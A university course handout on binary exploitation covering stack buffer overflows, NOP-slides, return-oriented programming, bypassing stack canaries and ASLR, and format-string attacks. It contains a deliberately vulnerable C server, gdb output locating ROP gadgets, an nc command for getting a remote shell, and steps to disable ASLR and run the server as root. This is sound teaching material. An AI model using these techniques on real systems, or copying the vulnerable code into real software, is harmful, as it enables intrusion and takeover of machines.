Class 11: Exploit¶
Date: 13.05.2025
Additional materials¶
Program stack¶
Every process has a stack, provided by the operating system. It is nothing more than a mapped, contiguous segment of the process's address space together with a stack pointer register (called SP in this scenario). Local variables, return addresses of currently executing functions, and intermediate results of calculations are stored on the stack. The operations are trivial to implement:
- putting data onto the stack means writing to the memory pointed to by the SP register and adjusting this register by the size of the written data
- taking data from the stack means reading from the memory pointed to by SP and adjusting SP by the size of the data taken
The operating system initially maps a fixed amount of stack memory for a program (around 2 pages) and allocates further memory pages only when they are needed.
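The two operations can be modelled in a few lines. The sketch below is a toy model, not how any real CPU or kernel is implemented: the class name ToyStack, the 64-byte size and the 4-byte word are assumptions made for illustration, and the direction of growth follows the x86 convention (SP decreases on a push).

```python
import struct


class ToyStack:
    """A downward-growing stack over a flat byte array (illustration only)."""

    WORD = 4  # bytes per stack slot, as on i386

    def __init__(self, size=64):
        self.mem = bytearray(size)
        self.sp = size  # empty stack: SP sits just past the mapped region

    def push(self, value):
        """Move SP down by one word, then store the value there."""
        if self.sp < self.WORD:
            raise OverflowError("stack exhausted")
        self.sp -= self.WORD
        struct.pack_into("<I", self.mem, self.sp, value)

    def pop(self):
        """Read the word at SP, then move SP back up by one word."""
        if self.sp + self.WORD > len(self.mem):
            raise IndexError("stack is empty")
        (value,) = struct.unpack_from("<I", self.mem, self.sp)
        self.sp += self.WORD
        return value


stack = ToyStack()
stack.push(0x11111111)
stack.push(0x22222222)
sp_after_pushes = stack.sp  # two words below the initial SP
top = stack.pop()           # the most recently pushed value
```

Note that "allocating" or "freeing" space here never touches the byte array's size; only the sp field changes.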
i386¶
For the purposes of this scenario, we will focus on x86 architectures:
- SP points to the byte at the top of the stack
- the stack grows downwards, meaning putting data onto the stack decreases SP
- on Linux and BSD, the function caller should (in the classic case, more in [1]):
  - save the contents of registers other than BP, SI, DI, BX (if it wants to use them later)
  - put the arguments onto the stack in reverse order of their declaration
  - jump to the body of the called function, putting the current location in the program code onto the stack (the return address)
  - upon return of the called function, remove the arguments from the stack (the result is in AX)
- the called function should:
  - save registers BP, SI, DI, BX if it intends to change them
  - optionally set the BP register to the content of SP (needed to obtain stack traces and simplifies assembler code, but is not mandatory; in gcc, generating such code can be disabled with the -fomit-frame-pointer flag)
  - reserve space on the stack for local variables (by shifting SP)
  - execute its body
  - restore registers
  - put the result into AX
  - jump to the address from the top of the stack - the return address, the one placed by the caller
x86_64¶
In the x86_64 architecture, function calls look very similar, except that the first 6 integer or pointer arguments are passed in registers RDI, RSI, RDX, RCX, R8, R9 (floating-point arguments use XMM0-7 instead). If a function has more arguments, the remaining ones are passed via the stack, just like in i386. Of course, all addresses are 8 bytes wide.
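As a rough illustration of this rule, the sketch below lists where each integer or pointer argument can be found at the moment the called function starts executing. The function name int_arg_locations is made up for this example, and floating-point arguments and structures passed by value are deliberately ignored.

```python
# Registers used for the first six integer/pointer arguments, in order.
INT_ARG_REGS = ["RDI", "RSI", "RDX", "RCX", "R8", "R9"]


def int_arg_locations(count):
    """Return the location of each of `count` integer arguments at callee entry."""
    locations = []
    for i in range(count):
        if i < len(INT_ARG_REGS):
            locations.append(INT_ARG_REGS[i])
        else:
            # [RSP] holds the return address, so stack arguments start at RSP+8.
            offset = 8 * (i - len(INT_ARG_REGS) + 1)
            locations.append(f"[RSP+{offset}]")
    return locations


eight_args = int_arg_locations(8)
```

For an attacker this matters because data placed on the stack no longer becomes a function argument automatically; it first has to be moved into a register.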
Disadvantages and advantages of the stack¶
As can be seen from this scenario, allocating local variables is very fast, because it boils down to modifying one register, and as long as local variables are multiples of the processor's word size, there is no fragmentation problem. These two features give stack allocation a significant advantage over heap allocation - malloc needs complex memory management logic and it is difficult to avoid fragmentation. Nevertheless, the stack is not suitable for holding variables whose lifespan exceeds a single function call. Another feature of the stack is the ease of predicting the arrangement of program data on it and, in the case of a poorly written program, using this knowledge to take control of the program.
Buffer overflow¶
This term refers to a situation where, for some reason, the program "forgets" the actual size of a buffer and exceeds its boundaries, accessing memory that does not belong to it. Example:
char c[5];
strcpy(c, "12345");
strcpy() copies a string to the buffer passed as the first argument, along with the terminating null byte, so in this case it writes 6 bytes into a 5-element buffer.
The C standard leaves the result of such a write undefined and does not specify how local variables are laid out in memory, but compilers behave predictably, and it is easy to guess how variables are arranged relative to each other on the stack (usually sequentially).
This makes one particular kind of buffer overflow, the stack buffer overflow, easy to exploit: by exceeding the buffer boundary far enough, one can overwrite the function's return address.
If done skillfully, one can take control of the program, because the ret instruction in the attacked program's code will jump to whatever location is written in the return address.
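The effect of the extra byte can be shown with a toy model. In the sketch below the "frame" is just a byte array in which a 5-byte buffer is immediately followed by a 4-byte return address. That layout, the address value and the helper name unchecked_copy are all assumptions for illustration; a real compiler may insert padding or saved registers in between.

```python
import struct


def unchecked_copy(memory, dest, text):
    """Mimic strcpy(): copy `text` plus a NUL byte, ignoring the buffer size."""
    data = text + b"\x00"
    memory[dest:dest + len(data)] = data
    return len(data)


# Toy frame: a 5-byte buffer immediately followed by a 4-byte return address.
BUF_SIZE = 5
frame = bytearray(BUF_SIZE) + bytearray(struct.pack("<I", 0x08048ABC))

written = unchecked_copy(frame, 0, b"12345")
(ret_after,) = struct.unpack_from("<I", frame, BUF_SIZE)
# The terminating NUL landed on the lowest byte of the stored address.
```

Even this one-byte overflow changes where the function would return; a longer input would replace the whole address.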
inetd¶
inetd is a standard Unix daemon, a so-called superserver. In the inetd.conf configuration file, programs are assigned to various network services, e.g., proftpd to the ftp service. inetd listens on the appropriate ports and, when a connection is established, starts the program assigned to the service with descriptors 0 and 1 set up so that the program sends data over the network by writing to standard output and receives data by reading from standard input.
This approach used to be much more popular than it is today, although this daemon is still common.
A newer version of the daemon is called xinetd and differs mainly in how it is configured: instead of one common inetd.conf file, each service has a separate file in the xinetd.d directory.
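The descriptor wiring can be tried out without a real network. The sketch below assumes a Unix-like system: a socket pair stands in for the accepted connection, and a one-line Python program stands in for the service. The names SERVICE_CODE and serve_one_request are made up for this example, and real inetd does considerably more (listening, forking, switching users).

```python
import socket
import subprocess
import sys

# Stand-in for a network service: it only knows about stdin and stdout.
SERVICE_CODE = "import sys; sys.stdout.write(sys.stdin.readline().upper())"


def serve_one_request(request):
    """Run the service with descriptors 0 and 1 bound to a socket."""
    client, server_side = socket.socketpair()
    with client, server_side:
        proc = subprocess.Popen(
            [sys.executable, "-c", SERVICE_CODE],
            stdin=server_side.fileno(),   # becomes descriptor 0 in the child
            stdout=server_side.fileno(),  # becomes descriptor 1 in the child
        )
        client.sendall(request)
        reply = client.recv(1024)
        proc.wait()
    return reply


reply = serve_one_request(b"hello\n")
```

The service itself contains no networking code at all, which is exactly why a program started this way becomes reachable from the network through its ordinary input handling.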
Writing an exploit¶
Exploit - colloquial name for a program that exploits a vulnerability in another program.
If we can find a place where a buffer can be overrun by an arbitrary amount, we can overwrite the return address in such a way that the program does what the attacker wants.
For simplicity, let's assume we are dealing with the following code (server.c):
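#include <stdio.h>

int test()
{
    char buf[128];
    /* Deliberately vulnerable: "%s" has no width limit, so long input overflows buf. */
    if (scanf("%s", buf) == EOF)
        return 0;
    /* Deliberately vulnerable: user input is used as the format string. */
    printf(buf);
    return 1;
}

int main()
{
    while (test()) {
        fflush(stdout);
    }
    return 0;
}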
We assume that this code is run via inetd. Our goal is to obtain everything that the user this program runs as can obtain. A sketch of what we will write:
- we will send code to be executed (the so-called payload)
- in addition to the payload, we will send data such that, instead of returning from the test() function, the program executes the payload
Problems:
- check how much garbage needs to be inserted before the fake return address in the malicious message to hit the right spot on the stack
- find out what to overwrite the return address with to jump to the payload
- write a payload that does something sensible
Finding out where the return address is, having the source code, is easy - just count, keeping in mind how function calls look on x86. Without the source code, this can be done by dumping memory (the stack) and, starting from the top of the stack (which is known, because the SP register is known), looking for 4/8-byte aligned numbers that point into the memory area where the program code is mapped. A bigger problem is finding out where to jump, because:
- the stack address is assigned by the operating system
- at first glance, it is not clear what is on the stack below the main function
- even if, by reading the libc and kernel code, we find out what and how much is on the stack below the main function, it turns out that it is not a constant amount, because it depends, for example, on:
  - the size of the arguments passed to the program
  - the environment
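The stack-dump scan mentioned earlier for locating the return address (looking for aligned numbers that point into the code mapping) can be sketched as follows. The function name find_code_pointers, the sample dump and all addresses in it are invented for illustration; in practice the dump would come from a core file or a debugger.

```python
import struct


def find_code_pointers(dump, dump_addr, code_start, code_end, word=8):
    """Return (address, value) pairs for aligned words that point into the code."""
    fmt = "<Q" if word == 8 else "<I"
    # Skip ahead to the first word-aligned address inside the dump.
    first = (-dump_addr) % word
    hits = []
    for off in range(first, len(dump) - word + 1, word):
        (value,) = struct.unpack_from(fmt, dump, off)
        if code_start <= value < code_end:
            hits.append((dump_addr + off, value))
    return hits


# Made-up 32-byte stack dump starting at a made-up stack address.
sample_dump = struct.pack("<4Q", 0x41414141, 0x7FFD00001000, 0x400612, 0)
candidates = find_code_pointers(sample_dump, 0x7FFD00000F00, 0x400000, 0x401000)
```

Each hit is only a candidate: a value may point into the code area by coincidence, so the result still has to be checked against the disassembly.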
Fortunately, on many systems the stack always starts at the same address, close to the end of the process's virtual address space, so the fluctuations in the position of this buffer cannot be very large - they depend mainly on the environment and program arguments. Hence, the fluctuations in the buffer address can be reasonably estimated - just run the program with an empty environment in the / directory, without arguments, and check the address of any local variable. It is almost certain that the address will never be higher than this, because a larger environment or more arguments only push the stack further down. This gives us one bound; for the other, we have to accept some reasonable limit on the size of the environment and arguments. For simplicity, for now, we ignore the fact that on most current systems the stack address is random (within a certain range). If we arrange the stack as follows:
Before attack | After attack |
---|---|
? | payload |
? | NOP |
? | NOP |
? | NOP |
? | NOP |
? | NOP |
? | NOP |
? | NOP |
? | NOP |
? | NOP |
? | NOP |
return address | malicious return address |
optionally saved registers | garbage |
buffer | garbage |
(NOP stands for an instruction that does nothing)
it is enough for the malicious return address to point to any of the NOP instructions. If there are enough of them, this absorbs the fluctuations in the buffer address. This technique of inserting a large number of NOPs is called a NOP-slide, because, figuratively speaking, execution slides down the NOPs to the payload.
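The layout from the table can be written down as a byte string, read from low to high addresses. The sketch below is only a layout illustration under stated assumptions: the offset of 136 bytes, both addresses and the sled length are made-up numbers, the helper names are hypothetical, and the payload is a placeholder of breakpoint instructions rather than real code.

```python
import struct

NOP = b"\x90"  # single-byte x86 NOP instruction


def build_message(offset_to_ret, ret_addr, sled_len, payload):
    """Lay out: garbage | return address | NOP-slide | payload (low to high)."""
    garbage = b"A" * offset_to_ret          # fills the buffer and saved registers
    fake_ret = struct.pack("<Q", ret_addr)  # 8-byte little-endian address
    return garbage + fake_ret + NOP * sled_len + payload


def landing_range(ret_slot_addr, sled_len):
    """First and last address the overwritten return address may point to."""
    sled_start = ret_slot_addr + 8
    return sled_start, sled_start + sled_len - 1


placeholder_payload = b"\xcc" * 4  # int3 breakpoints, stands in for real code
message = build_message(136, 0x7FFFFFFFE000, 64, placeholder_payload)
lowest, highest = landing_range(0x7FFFFFFFDF00, 64)
```

The width of the landing range is what the NOP-slide buys: the longer the slide, the larger the uncertainty in the stack address it can absorb.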
Technical details¶
Tools:
- objdump: disassembles compiled programs - useful for analysis, especially with the -d flag
- ulimit: manages user limits - needed only to ask the kernel to write memory dumps (core dumps) when the program crashes, which is useful in debugging (-c flag)
- gdb: debugging, with the ability to load a memory dump
- gcc: for compiling programs, including the payload
- /proc/self/maps: this file in Linux shows the process's memory mappings, which makes it possible to see where the stack starts
- netcat (nc): program that will be used to send the exploit over the network
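Reading the stack location from the memory map can be automated. The sketch below parses text in the /proc/self/maps format; the function name find_mapping is made up for this example, and the two sample lines are invented rather than taken from a real process.

```python
def find_mapping(maps_text, name):
    """Return (start, end, perms) of the first mapping whose path is `name`."""
    for line in maps_text.splitlines():
        fields = line.split()
        # Line format: start-end perms offset dev inode [path]
        if len(fields) >= 6 and fields[5] == name:
            start, end = (int(part, 16) for part in fields[0].split("-"))
            return start, end, fields[1]
    return None


# Invented sample in the format of /proc/<pid>/maps.
SAMPLE_MAPS = """\
00400000-00401000 r-xp 00000000 08:01 1234 /root/server
7ffffffde000-7ffffffff000 rw-p 00000000 00:00 0 [stack]
"""

stack_mapping = find_mapping(SAMPLE_MAPS, "[stack]")
```

On Linux, passing the contents of /proc/self/maps instead of SAMPLE_MAPS gives the stack range of the running interpreter; the permission field also shows whether the stack is executable.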
Step-by-step implementation¶
The simplest and most effective payload is one that launches a shell, i.e., executes execve. Since the launched program inherits descriptors, and a program launched by inetd uses descriptors 0, 1, and 2 for network communication, calling execve achieves an effect similar to a remote shell.
Since it is not clear where the PLT is located (it depends on the compiler and on very minor code changes), and even less clear where the libc library code is mapped, it is better to invoke syscalls directly, bypassing the wrappers provided by the standard library. Details were discussed in the second class.
Knowing how to execute a syscall, one should write a program in assembler that executes execve on /bin/sh. An example is in the payload.s file.
The executable code of this program will be our payload. Using make show-payload, you can see this code in a format suitable for saving in C.
The demo.c file shows how to transfer control directly to this code (brute_force function) and how to overwrite the return address with the payload address. The address used there follows solely from calculating what is on the stack according to the calling convention given at the beginning.
At this stage, we assume that the payload will be placed in executable memory. In the following part, we will discuss how to bypass this limitation.
The last step is to deliver the payload to the program from outside, along with the malicious return address and the NOP-slide. The position of the address in the buffer follows directly from the demo.c example. The address itself, however, was determined experimentally by checking the address of a local variable in the main() function.
This can be seen in the exploit.py file. After sending the malicious data, we need to be able to send commands somehow; this can be done as follows:
(./exploit.py; cat) | ./server
Network attack¶
To achieve the same effect over the network (inetd), you need to experiment a bit with the buffer size (the size of the NOP-slide) and the address to jump to. Then it is enough to use netcat (nc command) to interact with the remotely running server, which will later be a shell. To do this, run:
nc -c "./exploit.py;socat STDIO OPEN:/dev/tty" server_address port
If everything goes well, the result will be exploiting the vulnerability of a 20-line program to take control of a remote computer.
Non-executable stack (NX)¶
One of the mechanisms meant to make attacks of this type more difficult is marking memory pages that must not be executed (NX flag). In particular, the stack normally does not contain program code, so it can be marked this way.
However, this does not prevent the attack; it only makes it a little more difficult - we cannot jump directly to the sent payload, but we can use everything that is already loaded in memory and marked as executable - in particular, the standard library (directly or via the PLT).
On the i386 architecture, one can simply place the address of, e.g., the system() function from libc at the return address location and place its arguments a bit further.
This requires the address of the string /bin/sh or another equally useful string. Since the exact stack address is not known, one cannot (directly) provide this string oneself. But a moment of searching shows that the necessary string is in the standard library:
$ xxd /lib64/libc.so.6|grep -A 1 /bin
01841a0: 6974 7900 6e61 6e00 2d63 002f 6269 6e2f ity.nan.-c./bin/
01841b0: 7368 0065 7869 7420 3000 4d53 4756 4552 sh.exit 0.MSGVER
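The same search can be done programmatically. The sketch below looks for a byte string in a file and returns its file offsets; the name find_offsets is made up for this example, and the demonstration runs on a small temporary file whose contents imitate the libc fragment shown above rather than on a real library.

```python
import os
import tempfile


def find_offsets(path, needle):
    """Return every file offset at which `needle` occurs in the file."""
    with open(path, "rb") as f:
        data = f.read()
    offsets = []
    pos = data.find(needle)
    while pos != -1:
        offsets.append(pos)
        pos = data.find(needle, pos + 1)
    return offsets


# Demonstration on a stand-in file imitating the fragment of libc shown above.
with tempfile.NamedTemporaryFile(delete=False) as tmp:
    tmp.write(b"ity\x00nan\x00-c\x00/bin/sh\x00exit 0\x00")
demo_offsets = find_offsets(tmp.name, b"/bin/sh\x00")
os.unlink(tmp.name)
```

An offset found this way is a position in the file, not an address in the process; it still has to be translated using the address at which the library is mapped.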
In the case of the x86_64 architecture, it is a bit more complicated because the first parameters are passed through registers. But again, using what is already executable in memory, one can search for instruction sequences that load data from the stack into registers. This technique is known as Return-Oriented Programming (ROP), because the instruction sequences sought (so-called gadgets) most often have the form:
pop ...
ret
In this way, by placing gadget addresses and data alternately on the stack, we can load the desired data into registers.
Sometimes gadgets can be more complex, but to find the simplest ones, we can prepare a source file with the sought instructions (gadgets.s), compile it, and then search the process memory using the searchmem function from the peda extension to GDB:
$ objdump -d gadgets.o
(...)
0000000000000000 <main>:
0: 5f pop %rdi
1: c3 retq
2: 5e pop %rsi
3: c3 retq
gdb-peda$ searchmem "\x5f\xc3"
Searching for '_\xc3' in: None ranges
Found 543 results, display max 256 items:
server : 0x4007a3 (<__libc_csu_init+99>: pop rdi)
server : 0x6007a3 --> 0x841f0f2e6666c35f
libc : 0x7ffff7a3edd5 (<iconv+165>: pop rdi)
libc : 0x7ffff7a3ee02 (<iconv+210>: pop rdi)
(...)
gdb-peda$ searchmem "/bin/sh"
Searching for '/bin/sh' in: None ranges
Found 1 results, display max 1 items:
libc : 0x7ffff7ba21ab --> 0x68732f6e69622f ('/bin/sh')
An example using this technique is in the exploit-rop.py file.
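The alternating layout of gadget addresses and data can be sketched as follows. This is not the content of exploit-rop.py, only an illustration of the ordering: the gadget and string addresses are copied from the debugger output above, while the address used for system() is a made-up placeholder, and the helper names are hypothetical.

```python
import struct


def p64(value):
    """Pack an address as 8 little-endian bytes."""
    return struct.pack("<Q", value)


def build_chain(pop_rdi_ret, binsh_addr, system_addr):
    """Stack contents, starting at the overwritten return address."""
    return b"".join([
        p64(pop_rdi_ret),  # the function's ret jumps here: pop rdi; ret
        p64(binsh_addr),   # popped into RDI, the first argument register
        p64(system_addr),  # the gadget's own ret jumps here
    ])


POP_RDI_RET = 0x4007A3                  # from the searchmem output above
BINSH = 0x7FFFF7BA21AB                  # from the searchmem output above
HYPOTHETICAL_SYSTEM = 0x7FFFF7A5B000    # placeholder, not a real address

chain = build_chain(POP_RDI_RET, BINSH, HYPOTHETICAL_SYSTEM)
```

Each ret consumes one 8-byte slot as its jump target and each pop consumes one slot as data, which is why addresses and values alternate.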
Stack protector and address space randomization (ASLR)¶
GCC has the -fstack-protector option, which makes the compiler place a "canary" on the stack when a protected function starts executing: a value fixed at program startup that is checked before the function returns to see whether it has been changed.
However, if there is a bug in the program that allows the memory containing the "canary" to leak, this mechanism becomes useless. It so happens that the test program server.c contains such a bug - with control over the format string for printf(), any memory segment can be printed. An example is in exploit-rop-stack-protector.py.
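Once the canary value has leaked, it only has to be written back unchanged while the data behind it is overwritten. The sketch below is not the content of exploit-rop-stack-protector.py; it assumes a typical 64-bit layout (buffer, canary, saved BP, return address) and a leak printed in "%p" style, and all names and numbers in it are made up. The check on the lowest byte relies on glibc keeping that byte of the canary at zero on 64-bit Linux.

```python
import struct


def parse_pointer_leak(text):
    """Convert printf("%p")-style output such as b'0x1f00' to an integer."""
    return int(text.strip().decode("ascii"), 16)


def looks_like_canary(value):
    """Heuristic: a 64-bit value whose least-significant byte is zero."""
    return 0 < value < (1 << 64) and value & 0xFF == 0


def overflow_keeping_canary(distance_to_canary, canary, saved_bp, ret_addr):
    """Garbage up to the canary, then canary, saved BP and return address."""
    return b"A" * distance_to_canary + struct.pack("<QQQ", canary, saved_bp, ret_addr)


leaked = parse_pointer_leak(b"0x5d3a9c4e1b7f2a00\n")  # made-up leaked value
data = overflow_keeping_canary(136, leaked, 0, 0x4007A3)
```

The check before returning then still succeeds, because the canary slot holds the same value as before the overflow.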
Another mechanism that makes attacks more difficult is address space layout randomization (ASLR). It makes it harder to know the addresses to which one could conveniently jump. And again, a bug that allows memory to be read is enough to bypass this mechanism - given any address from the process's address space, one can check what should be there and calculate the remaining addresses from it. An example is in exploit-rop-stack-protector-aslr.py.
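The calculation of the remaining addresses is plain arithmetic, because randomization moves a whole library by one common amount. The sketch below assumes that one leaked address is known to correspond to a particular offset inside the library; the function name rebase and every number in the example are invented for illustration.

```python
def rebase(leaked_addr, leaked_offset, wanted_offsets):
    """Derive the load base from one leaked address, then other addresses."""
    base = leaked_addr - leaked_offset
    if base & 0xFFF:
        # Mappings start on page boundaries; anything else means a wrong guess.
        raise ValueError("base is not page aligned, offset is probably wrong")
    return base, {name: base + off for name, off in wanted_offsets.items()}


# Made-up numbers: a leaked pointer known to lie 0x3edd5 bytes into the library.
base, addrs = rebase(0x7F3A1C23EDD5, 0x3EDD5, {"system": 0x45390})
```

The page-alignment check is a cheap sanity test: if the assumed offset is wrong, the computed base usually does not end in three zero hex digits.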
Format string¶
Buffer overflow is not the only dangerous vulnerability. As seen earlier, giving an attacker control over the format string for printf() greatly facilitates attacks. But such a vulnerability can by itself be used to take control of the program.
Firstly, sensitive data (e.g., passwords) may be present in memory, and secondly, the %n format allows modifying memory.
Exploiting this is made easier by the fact that the field width can additionally be taken from printf parameters (e.g., %*d), and that the number of the parameter to be used can be specified (e.g., %4$d or %*5$d - combinations are also possible: %4$*5$d).
As a result, a primitive for copying data on the stack can be assembled from this:
- read data by printing a field of the appropriate width: %*15$d
- then the number "read" this way can be written using %23$n (%n stores the number of characters printed so far)
As long as interesting addresses are on the stack (or can be assembled using the above), memory can in practice be modified arbitrarily.
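The two building blocks can be generated mechanically. In the sketch below the helper names are made up and the parameter numbers 15 and 23 are simply the ones used in the text above; the last lines use Python's own "%*d" formatting, which pads in the same way, to show why the width of a printed field ends up as the value that %n would store.

```python
def leak_args(first, count):
    """Format string printing `count` consecutive parameters as pointers."""
    return ".".join(f"%{i}$p" for i in range(first, first + count))


def copy_primitive(width_arg, dest_arg):
    """Print a field as wide as parameter `width_arg`, then store the count."""
    return f"%*{width_arg}$d%{dest_arg}$n"


probe = leak_args(6, 3)
copy_fmt = copy_primitive(15, 23)

# A field padded to width 1000 produces 1000 characters, so a following %n
# in C would store 1000: the width has been "copied" into memory.
simulated_count = len("%*d" % (1000, 7))
```

Neither generated string contains whitespace, which matters when the string has to pass through an input routine that splits on it.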
An example program for experiments is in login.c. It is a simple tool that checks a hardcoded password hash and, if it matches, launches a shell. It is intended to be installed with the SUID bit set. Additionally, to be more user-friendly, it lets you provide your own password prompt text.
The goal of the attack is, of course, to bypass the password. To do this, one must find on the stack the address of the variable responsible for admitting the user, and then provide a parameter that overwrites this variable.
Moral¶
The above examples show how dangerous careless programming is. Although this is an example prepared for a course, the mechanism is common and widely exploited in practice. Security reports from internet portals such as Secunia confirm this.
Can we defend against this in any way? There are many methods; unfortunately, they only make the work of hackers more difficult but do not prevent it:
- stack randomization (the start of the stack is in a different place in each process)
- randomization of the entire address space - including the mapping location of libraries and the program loading location
- NX bit (newer processors allow marking a segment of the virtual address space, such as the stack, as Non-eXecutable, which causes an error when trying to execute the payload)
- gcc has the -fstack-protector option, which places a "canary" on the stack when a function starts and checks before the function returns whether it has been changed
- gcc and glibc have protection against format string attacks, activated by the compilation option -D_FORTIFY_SOURCE=2
- resolving all relocations early and switching the entire GOT and PLT to read-only
A quite good way to avoid memory management errors (including buffer overflow) is to use languages that handle this themselves, such as Java, Python, etc. Of course, this will not protect against errors in the implementation of such a compiler/interpreter itself.
Tips¶
- to disable stack randomization, change kernel settings:
  sysctl -w kernel.randomize_va_space=0
- to add an ftp-like server on port 21 to inetd, add the line:
  ftp stream tcp nowait root /root/server
- for the xinetd version, the analogous configuration requires the file /etc/xinetd.d/ftp:
  service ftp
  {
      disable = no
      id = ftp
      wait = no
      socket_type = stream
      user = root
      group = root
      server = /root/server
      #server_args =
  }
- when working with gdb, the "peda" extension (Python Exploit Development Assistance for GDB) is very useful - https://github.com/longld/peda
- in the payload, be careful with whitespace - scanf() stops reading at the first whitespace character
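A quick check for the last tip can be automated before anything is sent. The sketch below lists the positions of bytes that scanf("%s") treats as whitespace in the C locale; the function name whitespace_positions is made up for this example.

```python
# Bytes for which isspace() is true in the C locale.
SCANF_WHITESPACE = b" \t\n\v\f\r"


def whitespace_positions(data):
    """Return the indexes of bytes at which scanf("%s") would stop reading."""
    return [i for i, byte in enumerate(data) if byte in SCANF_WHITESPACE]


bad = whitespace_positions(b"\x90\x90\x0a\x41\x20")
clean = whitespace_positions(b"\x90\x90\xcc")
```

A non-empty result means the data would be cut short at the first listed position, so the offending bytes (which can also occur inside packed addresses) have to be avoided.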